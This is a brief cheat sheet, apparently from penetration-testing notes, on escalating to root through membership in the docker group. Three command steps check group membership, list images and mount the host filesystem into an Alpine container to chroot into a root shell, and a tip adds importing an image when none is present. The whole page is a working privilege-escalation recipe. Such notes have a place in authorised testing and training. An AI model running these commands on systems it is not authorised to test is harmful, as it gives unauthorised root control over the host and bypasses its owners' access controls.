Docker Group Privilege Escalation
Steps:
1) Confirm the user belongs in the docker group
id2) Check for images we can run
docker image list3) Get root shell
docker run -v /:/mnt --rm -it alpine chroot /mnt shTIP: If there are no images on the machine, you can import one yourself and use this to achieve root!
docker image import alpine.tar.gzLast updated